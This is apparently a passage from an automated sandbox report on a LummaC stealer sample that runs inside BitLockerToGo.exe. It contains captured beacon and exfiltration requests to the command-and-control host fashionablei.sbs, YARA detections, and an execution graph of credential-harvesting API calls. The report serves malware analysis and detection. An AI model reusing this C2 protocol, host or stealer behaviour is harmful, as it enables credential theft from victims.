                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gfxgZ8KwYGFoNN2jJ%2BTMOERpYexV%2Fi1IMsWaZxt%2F6ev7%2FkLvPhZISUaNHd2XX109SvUFj8guDJbFCm2tHqlRPjJFMKt7z1e%2F9jthRdHHtw%2B2YcVbQKuy32qSibmqe8eZdQk0"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0c16a9ea283f-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1558&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2160&delivery_rate=1886644&cwnd=251&unsent_bytes=0&cid=751b32656682783d&ts=502&x=0"
                                                                                                    2024-10-24 12:42:31 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                                                    Data Ascii: 11ok 173.254.250.71
                                                                                                    2024-10-24 12:42:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.449744188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:31 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 1117
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:31 UTC1117OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 0d 0a 2d 2d
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"28809E1F0843EFDDDD1428A490EDDE47--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--2--
                                                                                                    2024-10-24 12:42:32 UTC1018INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=bi8ovv4h7f1nmggqu8ahi5981s; expires=Mon, 17 Feb 2025 06:29:11 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wk%2ByuIfIo%2FoYJa%2FhAXiorT%2FCxEsxPJbgPObJMJbdEliZwGPoCmTo5%2F77AgZDfeBh2EwyvvL4JnyJF6hCmkm%2BdF%2BE49oeOyzX9qvzgZDK5GSynowfrSmYh%2Bc0NNYHWCklQza7"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0c1e1d2f3596-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2034&delivery_rate=2452159&cwnd=251&unsent_bytes=0&cid=17700f641ace51da&ts=536&x=0"
                                                                                                    2024-10-24 12:42:32 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                                                    Data Ascii: 11ok 173.254.250.71
                                                                                                    2024-10-24 12:42:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.449745188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:33 UTC265OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 110
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:33 UTC110OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 26 68 77 69 64 3d 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37
                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=tLYMe5--2&j=5c9b8674a630d9101b46733aa37f15ec&hwid=28809E1F0843EFDDDD1428A490EDDE47
                                                                                                    2024-10-24 12:42:33 UTC1010INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:33 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=ugdgf1r5dil9c3si98pupbckm0; expires=Mon, 17 Feb 2025 06:29:12 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XwcKtkm2jos2x32c3LLnlYS6EQ9oOgy%2B6QwEB8gcp2Phyhn1wLxCQBJ3QSYW95ZTjRDOkYSRoO0veBQCTorIhRlsS4qtX%2FMFPYnsf%2FRUBQqh5CLVn8QWX82LHftYo%2Fw5wsYA"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0c255c81465c-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1126&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1011&delivery_rate=2551541&cwnd=243&unsent_bytes=0&cid=bf4fe267be0a7f92&ts=477&x=0"
                                                                                                    2024-10-24 12:42:33 UTC54INData Raw: 33 30 0d 0a 4f 65 43 38 50 32 78 52 2b 76 38 51 46 74 6d 4d 49 6f 48 62 4a 48 52 39 4f 49 6c 2b 4e 45 37 53 4d 5a 6d 45 41 70 49 51 77 70 78 69 76 51 3d 3d 0d 0a
                                                                                                    Data Ascii: 30OeC8P2xR+v8QFtmMIoHbJHR9OIl+NE7SMZmEApIQwpxivQ==
                                                                                                    2024-10-24 12:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:08:41:57
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Users\user\Desktop\5Setup.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\5Setup.exe"
                                                                                                    Imagebase:0x2c0000
                                                                                                    File size:15'018'496 bytes
                                                                                                    MD5 hash:535428C4F1622391FA1F79D1210A308E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1880927609.0000000001F56000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1880927609.0000000002058000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1880927609.0000000002002000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1880927609.0000000001E42000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:08:42:09
                                                                                                    Start date:24/10/2024
                                                                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                    Imagebase:0xf40000
                                                                                                    File size:231'736 bytes
                                                                                                    MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:5.5%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:61.3%
                                                                                                      Total number of Nodes:282
                                                                                                      Total number of Limit Nodes:28
                                                                                                      execution_graph 19212 43f780 19213 43f7b0 19212->19213 19214 43f81e 19213->19214 19222 442710 LdrInitializeThunk 19213->19222 19219 43f9d2 19214->19219 19223 43f6a0 19214->19223 19217 43f8bf 19220 442710 LdrInitializeThunk 19217->19220 19221 43f94e 19217->19221 19218 43f710 RtlFreeHeap 19218->19219 19220->19221 19221->19218 19222->19214 19224 43f6c0 19223->19224 19224->19224 19225 43f6e1 RtlAllocateHeap 19224->19225 19226 446600 19227 446620 19226->19227 19227->19227 19229 44665e 19227->19229 19236 442710 LdrInitializeThunk 19227->19236 19228 4468ac 19229->19228 19231 43f6a0 RtlAllocateHeap 19229->19231 19233 446707 19231->19233 19235 44677f 19233->19235 19237 442710 LdrInitializeThunk 19233->19237 19238 43f710 19235->19238 19236->19229 19237->19235 19239 43f770 19238->19239 19240 43f725 RtlFreeHeap 19238->19240 19239->19228 19240->19239 19242 414407 19243 41440c 19242->19243 19246 41cab0 19243->19246 19245 414482 19247 41cac3 19246->19247 19247->19247 19257 445ed0 19247->19257 19249 41cc6d 19251 41cc8f 19249->19251 19253 41ccbd 19249->19253 19256 41cccc 19249->19256 19261 4461b0 19249->19261 19251->19253 19251->19256 19265 446260 19251->19265 19253->19256 19271 442710 LdrInitializeThunk 19253->19271 19255 41cf2c 19256->19245 19259 445ef0 19257->19259 19258 445fee 19258->19249 19259->19258 19272 442710 LdrInitializeThunk 19259->19272 19262 4461d0 19261->19262 19262->19262 19263 44620e 19262->19263 19273 442710 LdrInitializeThunk 19262->19273 19263->19251 19266 446290 19265->19266 19269 4462ce 19266->19269 19274 442710 LdrInitializeThunk 19266->19274 19267 44635e 19267->19253 19269->19267 19275 442710 LdrInitializeThunk 19269->19275 19271->19255 19272->19258 19273->19263 19274->19269 19275->19267 19277 442a03 19278 442a30 19277->19278 19280 442a6e 19278->19280 19284 442710 LdrInitializeThunk 19278->19284 19283 442710 LdrInitializeThunk 19280->19283 19282 442b81 19283->19282 19284->19280 19286 442d8e 19287 442d98 19286->19287 19289 442e5e 19287->19289 19292 442710 LdrInitializeThunk 19287->19292 19291 442710 LdrInitializeThunk 19289->19291 19291->19289 19292->19289 19293 442c8a 19294 442ca0 19293->19294 19294->19294 19295 442cc0 GetForegroundWindow 19294->19295 19296 442ccc 19295->19296 19297 40ced0 19298 40ced8 19297->19298 19299 40cf43 ExitProcess 19298->19299 19300 40cf3e 19298->19300 19302 40cf15 GetCurrentThreadId GetForegroundWindow 19298->19302 19320 442610 19300->19320 19303 40cf25 GetCurrentProcessId 19302->19303 19304 40cf2b 19302->19304 19303->19304 19304->19300 19308 410370 CoInitializeEx 19304->19308 19309 410500 19308->19309 19310 410393 CoInitializeSecurity 19308->19310 19313 41050e CoUninitialize 19309->19313 19310->19309 19311 410520 CoUninitialize 19310->19311 19312 4103b5 19310->19312 19310->19313 19318 4103bf 19311->19318 19323 43ce40 19312->19323 19313->19311 19316 410856 19317 4107ea GetSystemDirectoryW 19317->19318 19318->19311 19318->19316 19318->19317 19319 43f710 RtlFreeHeap 19318->19319 19328 40f490 19318->19328 19319->19318 19344 443c20 19320->19344 19322 442615 FreeLibrary 19322->19299 19326 43cea0 19323->19326 19324 43cf02 CoCreateInstance 19324->19326 19325 43ceda 19325->19318 19326->19324 19326->19325 19327 43cfc1 SysAllocString 19326->19327 19327->19326 19329 40f35f 19328->19329 19329->19328 19329->19329 19333 40f743 19329->19333 19334 40f371 19329->19334 19335 442630 19329->19335 19330 43f710 RtlFreeHeap 19330->19333 19332 442630 3 API calls 19332->19333 19333->19330 19333->19332 19333->19333 19333->19334 19334->19318 19336 4426d4 19335->19336 19337 44264d 19335->19337 19338 4426df 19335->19338 19339 44265b RtlReAllocateHeap 19335->19339 19340 4426da 19335->19340 19341 43f6a0 RtlAllocateHeap 19336->19341 19337->19338 19337->19339 19337->19340 19342 43f710 RtlFreeHeap 19338->19342 19339->19340 19340->19329 19341->19340 19342->19340 19345 443c29 19344->19345 19345->19322 19346 43d492 19347 43d496 SysFreeString 19346->19347 19348 43d4aa 19347->19348 19349 42a4d0 19351 42a4d9 19349->19351 19350 42a4e4 19351->19350 19358 43d860 19351->19358 19353 42ad3d 19354 445ed0 LdrInitializeThunk 19357 42ad05 19354->19357 19355 4461b0 LdrInitializeThunk 19355->19357 19356 42af26 CopyFileW 19356->19357 19357->19353 19357->19354 19357->19355 19357->19356 19367 4464f0 19358->19367 19362 43d8e4 19365 43d96e 19362->19365 19391 442710 LdrInitializeThunk 19362->19391 19363 43d8a5 19363->19362 19381 446e50 19363->19381 19365->19357 19369 446510 19367->19369 19368 43d87b 19368->19365 19371 4468c0 19368->19371 19369->19368 19392 442710 LdrInitializeThunk 19369->19392 19373 4468e0 19371->19373 19372 446928 19374 446b59 19372->19374 19375 43f6a0 RtlAllocateHeap 19372->19375 19373->19372 19393 442710 LdrInitializeThunk 19373->19393 19374->19363 19378 446969 19375->19378 19377 43f710 RtlFreeHeap 19377->19374 19380 4469ce 19378->19380 19394 442710 LdrInitializeThunk 19378->19394 19380->19377 19382 446e5f 19381->19382 19383 446f0e 19382->19383 19395 442710 LdrInitializeThunk 19382->19395 19384 447159 19383->19384 19386 43f6a0 RtlAllocateHeap 19383->19386 19384->19362 19387 447000 19386->19387 19389 44709e 19387->19389 19396 442710 LdrInitializeThunk 19387->19396 19388 43f710 RtlFreeHeap 19388->19384 19389->19388 19391->19365 19392->19368 19393->19372 19394->19380 19395->19383 19396->19389 19405 446e50 19406 446e5f 19405->19406 19407 446f0e 19406->19407 19415 442710 LdrInitializeThunk 19406->19415 19408 447159 19407->19408 19410 43f6a0 RtlAllocateHeap 19407->19410 19411 447000 19410->19411 19413 44709e 19411->19413 19416 442710 LdrInitializeThunk 19411->19416 19412 43f710 RtlFreeHeap 19412->19408 19413->19412 19415->19407 19416->19413 19417 430417 19418 430450 19417->19418 19419 4305b5 GetPhysicallyInstalledSystemMemory 19418->19419 19420 4305d9 19419->19420 19421 443351 19423 44335f 19421->19423 19422 4433be 19423->19422 19426 442710 LdrInitializeThunk 19423->19426 19425 4433ee 19426->19425 19427 426b58 19428 426bc0 19427->19428 19428->19428 19438 446040 19428->19438 19430 426ee6 19432 426fd9 19430->19432 19433 42712e 19430->19433 19442 424490 19430->19442 19432->19432 19445 424300 19432->19445 19435 426ed1 GetLogicalDrives 19437 446040 LdrInitializeThunk 19435->19437 19436 426d90 19436->19430 19436->19432 19436->19433 19436->19435 19436->19436 19437->19430 19439 446060 19438->19439 19440 44615e 19439->19440 19453 442710 LdrInitializeThunk 19439->19453 19440->19436 19443 445ed0 LdrInitializeThunk 19442->19443 19444 4244db 19443->19444 19446 424410 19445->19446 19447 42435d 19445->19447 19451 42447d 19445->19451 19452 424351 19445->19452 19449 424490 LdrInitializeThunk 19446->19449 19446->19451 19450 424490 LdrInitializeThunk 19447->19450 19448 424490 LdrInitializeThunk 19448->19446 19449->19451 19450->19452 19451->19433 19452->19448 19453->19440 19454 42fd63 19455 42fd6d 19454->19455 19460 42fd72 19454->19460 19456 42fe5d GetComputerNameExA 19455->19456 19457 42feb0 GetComputerNameExA 19456->19457 19461 42ffe0 19457->19461 19459 42fe3b FreeLibrary 19459->19455 19460->19459 19462 429fe0 19463 42a010 19462->19463 19464 42a05e 19463->19464 19472 442710 LdrInitializeThunk 19463->19472 19465 42a16c 19464->19465 19467 43f6a0 RtlAllocateHeap 19464->19467 19469 42a0e2 19467->19469 19468 43f710 RtlFreeHeap 19468->19465 19471 42a168 19469->19471 19473 442710 LdrInitializeThunk 19469->19473 19471->19468 19472->19464 19473->19471 19474 4309a1 19476 4309bd 19474->19476 19477 43caf0 19476->19477 19480 43cb18 19477->19480 19478 43cdd7 19478->19476 19482 43cbdf 19480->19482 19486 442710 LdrInitializeThunk 19480->19486 19482->19478 19484 43cccf 19482->19484 19485 442710 LdrInitializeThunk 19482->19485 19484->19478 19487 442710 LdrInitializeThunk 19484->19487 19485->19482 19486->19480 19487->19484 19488 41d667 19489 41d66c 19488->19489 19490 4461b0 LdrInitializeThunk 19489->19490 19491 41d682 19490->19491 19492 446260 LdrInitializeThunk 19491->19492 19493 41d6bd 19491->19493 19492->19493 19504 41d78e 19493->19504 19507 442710 LdrInitializeThunk 19493->19507 19495 41dbb5 19496 41e0cf 19495->19496 19497 41dd5d 19495->19497 19498 41da5f 19495->19498 19499 41dfea 19495->19499 19505 41de29 19495->19505 19501 420d60 LdrInitializeThunk 19496->19501 19508 420d60 19497->19508 19498->19498 19500 420d60 LdrInitializeThunk 19499->19500 19500->19496 19501->19498 19502 41da2e CryptUnprotectData 19502->19495 19502->19498 19504->19495 19504->19498 19504->19502 19505->19496 19505->19498 19505->19499 19505->19505 19506 446040 LdrInitializeThunk 19505->19506 19506->19505 19507->19504 19509 420d8a 19508->19509 19511 420e12 19508->19511 19509->19509 19509->19511 19512 4218b0 19509->19512 19511->19511 19513 4218d0 19512->19513 19514 424300 LdrInitializeThunk 19513->19514 19515 421c8a 19514->19515 19516 442fec 19517 443010 19516->19517 19517->19517 19518 443058 19517->19518 19520 442710 LdrInitializeThunk 19517->19520 19520->19518 19521 43d028 19522 43d060 19521->19522 19522->19522 19523 43d0be SysAllocString 19522->19523 19524 43d150 19523->19524 19524->19524 19525 43d1ac SysAllocString 19524->19525 19526 43d1d3 19525->19526 19527 43d462 SysFreeString SysFreeString 19526->19527 19528 43d290 19526->19528 19529 43d22a VariantInit 19526->19529 19530 43d1e9 19526->19530 19529->19528 19530->19528 19530->19529 19531 4231f0 19532 423200 19531->19532 19533 446040 LdrInitializeThunk 19532->19533 19535 423254 19533->19535 19534 423303 19535->19534 19535->19535 19536 424490 LdrInitializeThunk 19535->19536 19536->19534 19537 424070 19538 4240c8 19537->19538 19539 42407e 19537->19539 19543 424180 19539->19543 19541 42413c 19541->19538 19542 423330 LdrInitializeThunk 19541->19542 19542->19538 19544 424190 19543->19544 19545 446040 LdrInitializeThunk 19544->19545 19546 42429f 19545->19546 19547 4464f0 19549 446510 19547->19549 19548 4465cf 19549->19548 19551 442710 LdrInitializeThunk 19549->19551 19551->19548 19552 43d5bb 19555 4454d0 19552->19555 19556 43d5cb GetVolumeInformationW 19555->19556 19557 43453d CoSetProxyBlanket 19558 42ee3d 19559 42ee05 19558->19559 19560 42ee45 19558->19560 19561 42efa8 19560->19561 19566 442710 LdrInitializeThunk 19560->19566 19565 442710 LdrInitializeThunk 19561->19565 19564 42f197 19565->19564 19566->19561

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 41d667-41d694 call 40c830 call 4461b0 5 41d701-41d724 0->5 6 41d6f8-41d6fe call 40c830 0->6 7 41d69b-41d6c5 call 40c820 call 446260 0->7 8 41d6da-41d6ee call 403d70 0->8 9 41d6cc 0->9 11 41d730-41d757 5->11 6->5 7->5 7->6 7->8 7->9 8->6 9->8 11->11 15 41d759-41d761 11->15 18 41d763-41d772 15->18 19 41d7aa-41d80b call 4046c0 15->19 21 41d780-41d787 18->21 27 41d810-41d84a 19->27 24 41d790-41d796 21->24 25 41d789-41d78c 21->25 24->19 29 41d798-41d7a7 call 442710 24->29 25->21 28 41d78e 25->28 27->27 30 41d84c-41d86a call 404810 27->30 28->19 29->19 35 41dbc1-41dc3f 30->35 36 41d871-41d873 30->36 37 41db90-41dba9 call 4454d0 30->37 38 41db72-41db8b call 4454d0 30->38 39 41dbb5-41dbbe call 40c830 30->39 40 41db5d-41db63 call 40c830 30->40 41 41db6c 30->41 42 41dbaf 30->42 43 41da5f-41da66 30->43 49 41dc40-41dc65 35->49 46 41d880-41d886 36->46 37->42 38->37 39->35 40->41 45 41da70-41da79 43->45 45->45 52 41da7b-41da7e 45->52 46->46 53 41d888-41d899 46->53 49->49 56 41dc67-41dc7f call 404810 49->56 58 41da80-41da85 52->58 59 41da87 52->59 60 41d8a0 53->60 61 41d89b-41d89e 53->61 56->35 56->37 56->38 56->39 56->40 56->41 56->42 56->43 71 41dc86-41dce7 56->71 64 41da8a-41dacf call 40c820 58->64 59->64 65 41d8a1-41d8ad 60->65 61->60 61->65 76 41dad0-41daea 64->76 69 41d8b4 65->69 70 41d8af-41d8b2 65->70 73 41d8b5-41d8d3 call 40c820 69->73 70->69 70->73 74 41dcf0-41dd33 71->74 84 41d9f2-41da58 call 4454d0 CryptUnprotectData 73->84 85 41d8d9-41d8e0 73->85 74->74 75 41dd35-41dd56 call 404840 74->75 88 41e000-41e010 75->88 89 41e0a0-41e0cf call 420d60 75->89 90 41de40-41de49 call 40c830 75->90 91 41de29-41de2f 75->91 92 41e10a-41e113 call 404940 75->92 93 41dfea-41dff1 75->93 94 41de4c-41de5a 75->94 95 41dfd0 75->95 96 41e070 75->96 97 41e050-41e058 75->97 98 41de72-41de86 call 404880 75->98 99 41e0d2-41e101 call 420d60 75->99 100 41dfd6-41dfe3 75->100 101 41e07a-41e08e call 40c830 75->101 102 41dd5d-41dd9f 75->102 76->76 79 41daec-41daf4 76->79 82 41db11-41db21 79->82 83 41daf6-41dafb 79->83 104 41db41-41db57 call 40cfa0 82->104 105 41db23-41db2a 82->105 103 41db00-41db0f 83->103 84->35 84->37 84->38 84->39 84->40 84->41 84->42 84->43 84->71 87 41d90a-41d963 call 421f70 * 2 85->87 140 41d8f0-41d8f2 87->140 141 41d965-41d97c call 421f70 87->141 118 41e031-41e03d 88->118 119 41e012-41e014 88->119 89->99 90->94 113 41de5b-41de6b call 404870 91->113 93->88 94->113 96->101 97->96 134 41ded0 98->134 135 41de88-41de8d 98->135 99->92 100->88 100->89 100->90 100->93 100->94 100->96 100->97 100->99 100->101 101->89 111 41dda0-41ddba 102->111 103->82 103->103 104->40 107 41db30-41db3f 105->107 107->104 107->107 111->111 124 41ddbc-41de24 call 420d60 111->124 113->88 113->89 113->90 113->92 113->93 113->94 113->95 113->96 113->97 113->98 113->99 113->100 113->101 118->97 130 41e020-41e02f 119->130 124->92 130->118 130->130 139 41ded2-41deda 134->139 138 41de99-41dea7 135->138 142 41de90 138->142 143 41dea9-41deab 138->143 144 41def0 139->144 145 41dedc-41dee1 139->145 146 41d8f6-41d904 140->146 141->146 155 41d982-41d9ab 141->155 148 41de91-41de97 142->148 143->142 149 41dead-41deb8 143->149 150 41def7-41df15 call 40c820 call 40e690 144->150 145->150 146->84 146->87 148->138 148->139 149->142 153 41deba-41dec3 149->153 161 41df17-41df19 150->161 162 41df1b-41df33 call 40c820 150->162 153->148 156 41dec5-41dec8 153->156 155->146 158 41d9b1-41d9d1 call 421f70 155->158 156->148 158->146 165 41d9d7-41d9ed 158->165 161->162 167 41df51-41df67 162->167 168 41df35-41df39 162->168 165->146 170 41dfa0 167->170 171 41df69-41df73 167->171 169 41df40-41df4f 168->169 169->167 169->169 173 41dfa7-41dfb1 call 446040 170->173 172 41df80-41df8f 171->172 172->172 174 41df91 172->174 176 41dfb6-41dfbe 173->176 174->173 176->88 176->89 176->90 176->93 176->94 176->95 176->96 176->97 176->99 176->100 176->101
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /2] $cgqz$f,$($s~{n$uys9$vmen$xugg$x|$zn|v
                                                                                                      • API String ID: 0-2902742906
                                                                                                      • Opcode ID: c4cb93e49a1027972acef7bc7db9bbba06ecced1595695488ff7c868e50c7bd2
                                                                                                      • Instruction ID: 947c09c3ff81f9782b5d384dfa54613870c3f9feecadd8a04cc46c6b812eddda
                                                                                                      • Opcode Fuzzy Hash: c4cb93e49a1027972acef7bc7db9bbba06ecced1595695488ff7c868e50c7bd2
                                                                                                      • Instruction Fuzzy Hash: 134214B59083409FC724DF24D8817EBB7E1EF95314F14892EE8D987392E7789981CB86

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 177 423330-423371 178 423380-42339e 177->178 178->178 179 4233a0-4233db call 41c680 178->179 182 4233e0-42340f 179->182 182->182 183 423411-42347f call 41c680 182->183 186 423480-42349a 183->186 186->186 187 42349c-423507 call 41c680 186->187 190 423510-423559 187->190 190->190 191 42355b-4235b1 call 41c680 190->191 194 4235c0-4235ed 191->194 194->194 195 4235ef-42364f call 41c680 194->195 198 423650-423681 195->198 198->198 199 423683-423693 call 41c680 198->199 201 423698-4236a8 199->201 202 423a00-423a10 201->202 203 423a50-423a52 201->203 204 4239f0-4239f9 201->204 205 4236e7 201->205 206 423807-423823 call 4461b0 201->206 207 423954-42396f 201->207 208 42382a-423857 call 40c820 call 446260 201->208 209 4237d9 201->209 210 42385e-4238bf 201->210 211 4239de-4239e8 201->211 212 4236af-4236c2 call 40cf50 201->212 213 42393d 201->213 224 423a42-423a49 202->224 225 423a12-423a1a 202->225 216 423a60-423a66 203->216 204->202 204->203 204->204 204->207 204->213 219 423b1b-423b2d call 40c830 204->219 220 423948-423951 call 40c830 204->220 221 4237e8-4237f8 call 40d780 call 40cf90 204->221 222 4237df-4237e5 call 40c830 204->222 218 4237fd-423806 205->218 206->202 206->203 206->204 206->207 206->208 206->210 206->211 206->213 206->219 206->220 206->221 206->222 226 423970-423984 207->226 208->202 208->203 208->204 208->207 208->210 208->211 208->213 208->219 208->220 208->221 208->222 209->222 223 4238c0-4238e0 210->223 211->202 211->203 211->204 211->207 211->213 211->219 211->220 211->221 211->222 243 4236d0-4236d9 212->243 213->220 216->216 227 423a68-423a83 216->227 219->202 219->203 219->204 219->207 219->213 219->220 219->221 219->222 220->207 221->218 222->221 223->223 236 4238e2-4238ed 223->236 224->203 224->204 224->207 224->219 224->220 224->221 224->222 237 423a2c-423a30 225->237 226->226 230 